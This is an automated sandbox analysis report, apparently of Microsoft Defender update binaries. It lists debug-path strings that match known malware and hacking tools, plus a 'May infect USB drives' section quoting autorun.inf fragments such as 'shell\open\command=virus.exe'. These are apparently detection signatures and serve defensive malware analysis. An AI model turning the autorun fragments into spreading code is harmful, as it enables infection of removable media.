Source: Binary string: \SupNewTab\bin\SupTab.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: "SimCorp.XMGRs.Testing.ApiTests.pdb source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp
Source: Binary string: tixati.pdb source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp
Source: Binary string: \i386\iSafeNetFilter.pdb source: MpSigStub.exe, 0000000B.00000003.18304294619.0000021B5E481000.00000004.00000001.sdmp
Source: Binary string: schtasks.pdbd*Microsoft Corporation source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp
Source: Binary string: c:\mpengine.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\winver\objfre\i386\winver.pdb source: MpSigStub.exe, 0000000B.00000003.18311409111.0000021B5E1CB000.00000004.00000001.sdmp
Source: Binary string: Amon\Current\nethfdrv\Production\netupdsrv.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: PicoTorrent.pdb source: MpSigStub.exe, 0000000B.00000003.18283697957.0000021B5F167000.00000004.00000001.sdmp
Source: Binary string: \AppSync.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: I \\aes_mfc\\Release\\aes_mfc.pdb source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp
Source: Binary string: appmgmts.pdb source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp
Source: Binary string: \src\out\Release\cleaner.pdb source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp
Source: Binary string: \chrome-toolbox\trunk\src\plugin\apihook.pdb source: MpSigStub.exe, 0000000B.00000003.18292104164.0000021B5EFDB000.00000004.00000001.sdmp
Source: Binary string: F:\Projects\MiniSword\MakeSword\MakeSword\obj\Debug\MakeSword.pdb source: MpSigStub.exe, 0000000B.00000003.18299061122.0000021B5F89F000.00000004.00000001.sdmp
Source: Binary string: \CoronaVirus Status.pdb source: MpSigStub.exe, 0000000B.00000003.18267435419.0000021B5E8B8000.00000004.00000001.sdmp
Source: Binary string: \svr_d\server_lyl\WinSAP\winSAP_2\Release\winSAP_2.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: \Minoral.pdb source: MpSigStub.exe, 0000000B.00000003.18283697957.0000021B5F167000.00000004.00000001.sdmp
Source: Binary string: I \\Projects\\dll.\\.+\\dll.\.pdb source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp
Source: Binary string: d:\pavbld\amcore\MpEngine\mavutils\Source\sigutils\vdlls\Microsoft.NET\VFramework\Windows\Windows.pdb source: MpSigStub.exe, 0000000B.00000003.18289348845.0000021B5EDA8000.00000004.00000001.sdmp
Source: Binary string: wpnpinst.pdb source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp
Source: Binary string: GC:\Users\wizzlabs\source\repos\SaveJuin\Nuigi\obj\Release\Baddelima.pdb source: MpSigStub.exe, 0000000B.00000003.18276069927.0000021B5E314000.00000004.00000001.sdmp
Source: Binary string: msiexec.pdb source: MpSigStub.exe, 0000000B.00000003.18283697957.0000021B5F167000.00000004.00000001.sdmp
Source: Binary string: adptif.pdb source: MpSigStub.exe, 0000000B.00000003.18313547011.0000021B5FEA2000.00000004.00000001.sdmp
Source: Binary string: D:\\MyCode\\riot.?\\encryptor.+\.pdb source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp
Source: Binary string: 0Z:\NewProjects\hotsend\Release-Win32\hotsend.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: <tmp\x86-Public-Game\LoL\RiotLoL_Client\League of Legends.pdba source: MpSigStub.exe, 0000000B.00000003.18304125166.0000021B5F0BC000.00000004.00000001.sdmp
Source: Binary string: \x64\Release\SFKEX64.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: .+:.*\\obfuscator\\SkypeBot.pdb source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp
Source: Binary string: D:\DevPatch\_FINAL\Bin\MapleStory.pdb source: MpSigStub.exe, 0000000B.00000003.18267883591.0000021B5F796000.00000004.00000001.sdmp
Source: Binary string: !kpdfcore\obj\Release\kpdfcore.pdb source: MpSigStub.exe, 0000000B.00000003.18294119439.0000021B5F7D9000.00000004.00000001.sdmp
Source: Binary string: SuzanDLL\Release\suzanw.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: T:\TFS-TradeProject\PDB\Release\TT-Miner.pdb source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp
Source: Binary string: \ggg\build\Release_32\libglib-2.0-0.pdb source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp
Source: Binary string: E:\Other\SecEdit\Sedisk\objfre_w2K_x86\i386\Sedisk.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: cmd.pdb source: MpSigStub.exe, 0000000B.00000003.18322603018.0000021B5FB74000.00000004.00000001.sdmp
Source: Binary string: Sniffer\Release\Sniffer.pdbxS source: MpSigStub.exe, 0000000B.00000003.18318367650.0000021B5EBB9000.00000004.00000001.sdmp
Source: Binary string: diskpart.pdb source: MpSigStub.exe, 0000000B.00000003.18319971981.0000021B5E81C000.00000004.00000001.sdmp
Source: Binary string: er.pdb source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp
Source: Binary string: x:\Dev_CPP\Work\VS_KnzStr_Adware\Release\VS_Work1.pdb source: MpSigStub.exe, 0000000B.00000003.18293714147.0000021B5DFB4000.00000004.00000001.sdmp
Source: Binary string: MpClient.pdb source: MpSigStub.exe, 0000000B.00000003.18211949370.0000021B4BCC2000.00000004.00000001.sdmp, mpam-728dfe11.exe, 00000011.00000003.18580711669.0000027770032000.00000004.00000001.sdmp, MpSigStub.exe, 00000012.00000003.18626366853.000002DF229B4000.00000004.00000001.sdmp
Source: Binary string: wship6.pdb3 source: MpSigStub.exe, 0000000B.00000003.18276333779.0000021B5E715000.00000004.00000001.sdmp
Source: Binary string: 9desktop_apps_ng\workspace\build\loader\Release\loader.pdb source: MpSigStub.exe, 0000000B.00000003.18283697957.0000021B5F167000.00000004.00000001.sdmp
Source: Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\logoff\objfre\i386\logoff.pdb source: MpSigStub.exe, 0000000B.00000003.18264231321.0000021B5ECC2000.00000004.00000001.sdmp
Source: Binary string: \\Projects\\dll.\\.+\\dll.\.pdb source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp
Source: Binary string: Seed\trunk\output\bin\ntsvc.pdbxO source: MpSigStub.exe, 0000000B.00000003.18269858527.0000021B5F43D000.00000004.00000001.sdmp
Source: Binary string: 2branches\xiaoyuTrunk\bin\Release\Win32\Upgrade.pdb source: MpSigStub.exe, 0000000B.00000003.18304834904.0000021B5E504000.00000004.00000001.sdmp
Source: Binary string: MpUxAgent.pdbGCTL source: mpam-728dfe11.exe, 00000011.00000003.18586235407.0000027770034000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-security-base-l1-1-0.pdb source: MpSigStub.exe, 0000000B.00000003.18282591502.0000021B5FCD4000.00000004.00000001.sdmp
Source: Binary string: 9C:\Users\Seman\source\repos\Triforce\Release\Triforce.pdb source: MpSigStub.exe, 0000000B.00000003.18304125166.0000021B5F0BC000.00000004.00000001.sdmp
Source: Binary string: FDM3\bin\Release\FdmBrowserHelper.pdb source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp
Source: Binary string: dsget.pdb source: MpSigStub.exe, 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp
Source: Binary string: wmidx.pdbj source: MpSigStub.exe, 0000000B.00000003.18279241647.0000021B5F9D1000.00000004.00000001.sdmp
Source: Binary string: ramaint.pdb source: MpSigStub.exe, 0000000B.00000003.18294428456.0000021B5F85C000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-registry-l1-1-0.pdbM8 source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp
Source: Binary string: mstext40.pdb3 source: MpSigStub.exe, 0000000B.00000003.18281462328.0000021B5FEE5000.00000004.00000001.sdmp
Source: Binary string: \Release\initialexe\torch.exe.pdbxE source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp
Source: Binary string: enumst\release\enumst.pdb] source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: d:\Projects\AKL\kh\Release\kh.pdb source: MpSigStub.exe, 0000000B.00000003.18291243257.0000021B5DF04000.00000004.00000001.sdmp
Source: Binary string: (setup\odbcconf\exe\obj\i386\odbcconf.pdb source: MpSigStub.exe, 0000000B.00000003.18283697957.0000021B5F167000.00000004.00000001.sdmp
Source: Binary string: \RocketTabInstaller\Release\Installer.pdb. source: MpSigStub.exe, 0000000B.00000003.18271011701.0000021B5F6D0000.00000004.00000001.sdmp
Source: Binary string: .:\GIT\addonInstaller\instui\Release\instui.pdb source: MpSigStub.exe, 0000000B.00000003.18270439860.0000021B5F64D000.00000004.00000001.sdmp
Source: Binary string: \\finalpro\\forlsa\\Win32Project.*\\Win32Project.+\.pdb source: MpSigStub.exe, 0000000B.00000003.18282861052.0000021B5E41D000.00000004.00000001.sdmp
Source: Binary string: ZohoTray.pdb source: MpSigStub.exe, 0000000B.00000003.18294428456.0000021B5F85C000.00000004.00000001.sdmp
Source: Binary string: .+:\\(projects|src)\\fcrypt\\Release\\S\\s_(high|low).pdb source: MpSigStub.exe, 0000000B.00000003.18282861052.0000021B5E41D000.00000004.00000001.sdmp
Source: Binary string: \iSafeKrnlKit.pdb source: MpSigStub.exe, 0000000B.00000003.18271875612.0000021B5DFCB000.00000004.00000001.sdmp
Source: Binary string: version.pdb@SH source: MpSigStub.exe, 0000000B.00000003.18303689469.0000021B5EF98000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-processthreads-l1-1-2.pdb source: MpSigStub.exe, 0000000B.00000003.18311409111.0000021B5E1CB000.00000004.00000001.sdmp
Source: Binary string: ToolbarCore\toolbar\ie\src\toolbar\wrapper\Release\externalwrapper.pdb source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp
Source: Binary string: release\wrapperex.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: c:\stayWide\softthey\markethorse\bothside\of.pdb source: MpSigStub.exe, 0000000B.00000003.18274688603.0000021B5EE4F000.00000004.00000001.sdmp
Source: Binary string: ?\UltraCam\Src\UltraMap\AtTool\AtTool\obj\x64\Release\AtTool.pdba^ source: MpSigStub.exe, 0000000B.00000003.18288653751.0000021B5ED05000.00000004.00000001.sdmp
Source: Binary string: \Release\bdSetup.pdb source: MpSigStub.exe, 0000000B.00000003.18303114379.0000021B5E7DA000.00000004.00000001.sdmp
Source: Binary string: Release\RuPass.pdb] source: MpSigStub.exe, 0000000B.00000003.18271011701.0000021B5F6D0000.00000004.00000001.sdmp
Source: Binary string: Release\VersionChecker.pdb source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp
Source: Binary string: SkypeTOPA\obj\Debug\PnonaSkype.pdb source: MpSigStub.exe, 0000000B.00000003.18313547011.0000021B5FEA2000.00000004.00000001.sdmp
Source: Binary string: \Release\shellcode.pdbxB source: MpSigStub.exe, 0000000B.00000003.18269292302.0000021B5F2B1000.00000004.00000001.sdmp
Source: Binary string: PCHunter64.pdb source: MpSigStub.exe, 0000000B.00000003.18288932805.0000021B5ED46000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-processtopology-obsolete-l1-1-0.pdb source: MpSigStub.exe, 0000000B.00000003.18311409111.0000021B5E1CB000.00000004.00000001.sdmp
Source: Binary string: rasautou.pdb0 source: MpSigStub.exe, 0000000B.00000003.18268155415.0000021B5F965000.00000004.00000001.sdmp
Source: Binary string: -\CVE-2019-0803201992\x64\Release\poc_test.pdba source: MpSigStub.exe, 0000000B.00000003.18283697957.0000021B5F167000.00000004.00000001.sdmp
Source: Binary string: MsMpEngCP.pdbGCTL source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp
Source: Binary string: csgoInjector.pdbx source: MpSigStub.exe, 0000000B.00000003.18285768845.0000021B5EE0D000.00000004.00000001.sdmp
Source: Binary string: samlib.pdb source: MpSigStub.exe, 0000000B.00000003.18285768845.0000021B5EE0D000.00000004.00000001.sdmp
Source: Binary string: blinkopt.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: PrivacyMaster\bin\Release\PCPrivacyShield.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: unknowndll.pdbx source: MpSigStub.exe, 0000000B.00000003.18315597835.0000021B5F713000.00000004.00000001.sdmp
Source: Binary string: ntoskrnl.pdb source: MpSigStub.exe, 0000000B.00000003.18277664161.0000021B5E0C2000.00000004.00000001.sdmp
Source: Binary string: MpAdlStub.pdbGCTL source: mpam-796ed98e.exe, 0000000A.00000000.18177888205.00007FF69C51F000.00000002.00020000.sdmp
Source: Binary string: c:.+:\\(projects|src)\\fcrypt\\Release\\S\\s_(high|low).pdb source: MpSigStub.exe, 0000000B.00000003.18282861052.0000021B5E41D000.00000004.00000001.sdmp
Source: Binary string: feclient.pdb source: MpSigStub.exe, 0000000B.00000003.18300370279.0000021B5E6B0000.00000004.00000001.sdmp
Source: Binary string: D:\\C\+\+\\.*ShellCode\\Release\\.*ShellCode.pdb source: MpSigStub.exe, 0000000B.00000003.18282861052.0000021B5E41D000.00000004.00000001.sdmp
Source: Binary string: MpClient.pdbGCTL source: MpSigStub.exe, 0000000B.00000003.18211949370.0000021B4BCC2000.00000004.00000001.sdmp, mpam-728dfe11.exe, 00000011.00000003.18580711669.0000027770032000.00000004.00000001.sdmp, MpSigStub.exe, 00000012.00000003.18626366853.000002DF229B4000.00000004.00000001.sdmp
Source: Binary string: ScreenSnapshot.pdb source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp
Source: Binary string: Release\NTDSDumpEx.pdb source: MpSigStub.exe, 0000000B.00000003.18274099229.0000021B5F60A000.00000004.00000001.sdmp
Source: Binary string: (\Install\trunk\out\release\setup.exe.pdb source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp
Source: Binary string: \bd2\master\bin\x64\Debug\bd2.pdb source: MpSigStub.exe, 0000000B.00000003.18277934839.0000021B5E8A0000.00000004.00000001.sdmp
Source: Binary string: \CCC\obj\Debug\CCC.pdbx source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp
Source: Binary string: PasswordFox.pdb source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp
Source: Binary string: SuzanDLL\Release\suzanw.pdbx source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: msswch.pdb source: MpSigStub.exe, 0000000B.00000003.18276333779.0000021B5E715000.00000004.00000001.sdmp
Source: Binary string: :\XiaZaiQi\pdbmap\WanNeng\Install.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp
Source: Binary string: \myservice_chrome_svc.pdb source: MpSigStub.exe, 0000000B.00000003.18301997089.0000021B5FD17000.00000004.00000001.sdmp
Source: Binary string: winsta.pdb source: MpSigStub.exe, 0000000B.00000003.18271011701.0000021B5F6D0000.00000004.00000001.sdmp
Source: Binary string: Microsoft.Exchange.Clients.Event.pdb source: MpSigStub.exe, 0000000B.00000003.18270439860.0000021B5F64D000.00000004.00000001.sdmp
Source: Binary string: U,.+:\\src\\tcrypt\\Release\\s_(high|low).pdb source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp
Source: Binary string: BTR.pdb source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp
Source: Binary string: :\VC5\release\kinject.dll.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: userenv.pdb3 source: MpSigStub.exe, 0000000B.00000003.18303689469.0000021B5EF98000.00000004.00000001.sdmp
Source: Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\chkdsk\objfre\i386\chkdsk.pdb source: MpSigStub.exe, 0000000B.00000003.18270729059.0000021B5F68E000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-processenvironment-l1-2-0.pdb source: MpSigStub.exe, 0000000B.00000003.18311409111.0000021B5E1CB000.00000004.00000001.sdmp
Source: Binary string: ApplyUpdate.pdb source: MpSigStub.exe, 0000000B.00000003.18274688603.0000021B5EE4F000.00000004.00000001.sdmp
Source: Binary string: C:\projects\FinalInstaller\finalinstaller\FinalInstaller\obj\imali_release\FinalInstaller_dotnet4.pdb source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp
Source: Binary string: endpointdlp.pdbGCTL source: mpam-728dfe11.exe, 00000011.00000003.18587207189.0000027770034000.00000004.00000001.sdmp
Source: Binary string: Elevated_MpMiniSigStub.pdb source: MpSigStub.exe, 0000000B.00000003.18299061122.0000021B5F89F000.00000004.00000001.sdmp
Source: Binary string: \SharPersist.pdb source: MpSigStub.exe, 0000000B.00000003.18288932805.0000021B5ED46000.00000004.00000001.sdmp
Source: Binary string: \Release\Skype Utility.pdb source: MpSigStub.exe, 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp
Source: Binary string: PD:\projects\new_Clicker\SIV\original\daemon\NewClieckerDll\Release\SIVUpdate.pdb source: MpSigStub.exe, 0000000B.00000003.18293714147.0000021B5DFB4000.00000004.00000001.sdmp
Source: Binary string: f:\ycc\gdrv64\objfre_wnet_AMD64\amd64\gdrv64.pdb source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp
Source: Binary string: CustomPlayback*\\Release\\CustomPlayback\.pdb source: MpSigStub.exe, 0000000B.00000003.18286078322.0000021B5EE90000.00000004.00000001.sdmp
Source: Binary string: tkDecript.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: d:\Autobuild\Work\BrowserExtensions\src\NSISCouponsPlugin\bin\Win32\Release\NSISCouponsPlugin.pdb source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp
Source: Binary string: C:\\Git\\[a-z]([a-z]{3,10})\\.{0,20}(Debug|Release).{0,20}\\[A-Z]\1(Exe|Dll)\.pdb source: MpSigStub.exe, 0000000B.00000003.18269292302.0000021B5F2B1000.00000004.00000001.sdmp
Source: Binary string: Release\TeamViewer.pdb source: MpSigStub.exe, 0000000B.00000003.18265076735.0000021B4BD14000.00000004.00000001.sdmp
Source: Binary string: Release\StrongVaultApp.pdb source: MpSigStub.exe, 0000000B.00000003.18270439860.0000021B5F64D000.00000004.00000001.sdmp
Source: Binary string: <Projects\CreateMessage\TestMessage\obj\Debug\ivtExchange.pdb source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: MpSigStub.exe, 0000000B.00000003.18304567311.0000021B5E4C2000.00000004.00000001.sdmp
Source: Binary string: \\WOO\\HT\\PortReuser\\.+\.pdb source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp
Source: Binary string: F:\hVjjmsck\zunzMo\dAQQ.pdb source: MpSigStub.exe, 0000000B.00000003.18313835752.0000021B5EED3000.00000004.00000001.sdmp
Source: Binary string: CatalinaUpdate_unsigned.pdbx| source: MpSigStub.exe, 0000000B.00000003.18311116875.0000021B5EDCA000.00000004.00000001.sdmp
Source: Binary string: ntvdm.pdb source: MpSigStub.exe, 0000000B.00000003.18289348845.0000021B5EDA8000.00000004.00000001.sdmp
Source: Binary string: offreg.pdb source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp
Source: Binary string: $loader\Driver\objfre\i386\apcdli.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: .smmservice_with_regedit\Release\smmservice.pdbx source: MpSigStub.exe, 0000000B.00000003.18286078322.0000021B5EE90000.00000004.00000001.sdmp
Source: Binary string: d:\MPEngine\amcore\MpEngine\mavutils\Source\sigutils\vdlls\Microsoft.NET\VFramework\System.Data\System.Data.pdbp1 source: MpSigStub.exe, 0000000B.00000003.18289348845.0000021B5EDA8000.00000004.00000001.sdmp
Source: Binary string: \wtsapi32_x86.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: Release\RuPass.pdb source: MpSigStub.exe, 0000000B.00000003.18271011701.0000021B5F6D0000.00000004.00000001.sdmp
Source: Binary string: \Ships.pdb source: MpSigStub.exe, 0000000B.00000003.18300850262.0000021B5F01C000.00000004.00000001.sdmp
Source: Binary string: Release\binkiland.exe.pdb source: MpSigStub.exe, 0000000B.00000003.18269292302.0000021B5F2B1000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: MpSigStub.exe, 0000000B.00000003.18260963344.0000021B5FB33000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-com-l1-1-0.pdb source: MpSigStub.exe, 0000000B.00000003.18260963344.0000021B5FB33000.00000004.00000001.sdmp
Source: Binary string: \release\libcurl.pdb source: MpSigStub.exe, 0000000B.00000003.18311409111.0000021B5E1CB000.00000004.00000001.sdmp
Source: Binary string: Release\toolbar.pdb source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp
Source: Binary string: iphlpapi.pdb source: MpSigStub.exe, 0000000B.00000003.18281462328.0000021B5FEE5000.00000004.00000001.sdmp
Source: Binary string: smmservice_with_regedit\Release\smmservice.pdb source: MpSigStub.exe, 0000000B.00000003.18286078322.0000021B5EE90000.00000004.00000001.sdmp
Source: Binary string: nanamnana\obj\Debug\nanamnana.pdb source: MpSigStub.exe, 0000000B.00000003.18300850262.0000021B5F01C000.00000004.00000001.sdmp
Source: Binary string: \tcrypt\Release\s_low.pdb source: MpSigStub.exe, 0000000B.00000003.18313547011.0000021B5FEA2000.00000004.00000001.sdmp
Source: Binary string: \TelMgr.pdb source: MpSigStub.exe, 0000000B.00000003.18290948970.0000021B5DE81000.00000004.00000001.sdmp
Source: Binary string: ?ExtractedBundle\RTM_ImageModRec_1.1.5.0_x64\RTM_ImageModRec.pdb source: MpSigStub.exe, 0000000B.00000003.18288653751.0000021B5ED05000.00000004.00000001.sdmp
Source: Binary string: D:\Work\TopMedia\SVN\GetPrivateInstaller\DLLs\InstallerService.pdb source: MpSigStub.exe, 0000000B.00000003.18274099229.0000021B5F60A000.00000004.00000001.sdmp
Source: Binary string: resutils.pdb source: MpSigStub.exe, 0000000B.00000003.18301997089.0000021B5FD17000.00000004.00000001.sdmp
Source: Binary string: \\NetSpy\\Distr\\KGBSpy\\Mpk64\.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: \ProcessHacker.pdb source: MpSigStub.exe, 0000000B.00000003.18288653751.0000021B5ED05000.00000004.00000001.sdmp
Source: Binary string: Release\tb_setup_zip.pdb source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp
Source: Binary string: klovnafa.pdbx0 source: MpSigStub.exe, 0000000B.00000003.18311409111.0000021B5E1CB000.00000004.00000001.sdmp
Source: Binary string: E:\\Production\\Tool-Developing\\.+\.pdb source: MpSigStub.exe, 0000000B.00000003.18286078322.0000021B5EE90000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-string-l2-1-0.pdb source: MpSigStub.exe, 0000000B.00000003.18266494773.0000021B5F47F000.00000004.00000001.sdmp
Source: Binary string: \SearchProtect\Bin\Release\CmdShell.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: \\dev\\Desktop\\Dropbox_control\\Client_Dropbox\\.+\.pdb source: MpSigStub.exe, 0000000B.00000003.18282861052.0000021B5E41D000.00000004.00000001.sdmp
Source: Binary string: RegCleaner\bin\Release\PCRegistryShield.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: transmission-qt.pdb source: MpSigStub.exe, 0000000B.00000003.18283697957.0000021B5F167000.00000004.00000001.sdmp

Spreading:

May infect USB drives
Source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp Binary or memory string: .vbs&startautorun.inf&exit
Source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp Binary or memory string: /cstartservieca.vbs&startautorun.inf&exit
Source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp Binary or memory string: +/cstartservieca.vbs&startautorun.inf&exit
Source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp Binary or memory string: [autorun]shellexecute="resycled\boot.com
Source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp Binary or memory string: /[autorun]shellexecute="resycled\boot.com
Source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp Binary or memory string: X:\autorun.inf
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp Binary or memory string: [autorun]open=avm10\avm10stakakodimolim.exe
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp Binary or memory string: -[autorun]open=avm10\avm10stakakodimolim.exe
Source: MpSigStub.exe, 0000000B.00000003.18267883591.0000021B5F796000.00000004.00000001.sdmp Binary or memory string: [AutoRun]
Source: MpSigStub.exe, 0000000B.00000003.18290395677.0000021B5E9A8000.00000004.00000001.sdmp Binary or memory string: %windir%\system32\autorun.inf
Source: MpSigStub.exe, 0000000B.00000003.18304125166.0000021B5F0BC000.00000004.00000001.sdmp Binary or memory string: >> autorun.inf
Source: MpSigStub.exe, 0000000B.00000003.18304125166.0000021B5F0BC000.00000004.00000001.sdmp Binary or memory string: .exe -h -s -r autorun.inf
Source: MpSigStub.exe, 0000000B.00000003.18304125166.0000021B5F0BC000.00000004.00000001.sdmp Binary or memory string: shell\open=Open >> autorun.inf
Source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp Binary or memory string: autorun.inf
Source: MpSigStub.exe, 0000000B.00000003.18307613737.0000021B5E0EE000.00000004.00000001.sdmp Binary or memory string: docopy/yautorun.inf%%x:autorun.inf
Source: MpSigStub.exe, 0000000B.00000003.18273744445.0000021B5FC83000.00000004.00000001.sdmp Binary or memory string: [autorun]open=
Source: MpSigStub.exe, 0000000B.00000003.18260543031.0000021B5FF27000.00000004.00000001.sdmp Binary or memory string: autorun.inf4++
Source: MpSigStub.exe, 0000000B.00000003.18274099229.0000021B5F60A000.00000004.00000001.sdmp Binary or memory string: [autorun];
Source: MpSigStub.exe, 0000000B.00000003.18274099229.0000021B5F60A000.00000004.00000001.sdmp Binary or memory string: x7[autorun];
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: \autorun.inf
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: torun.infshell\open\command=virus.exe[AutoRun]\virus.exe
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: AUTORUN.INF
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: [autorun]
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: \Autorun.inf
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: shell\explore\Command=system.exewt\Autorun.inf]
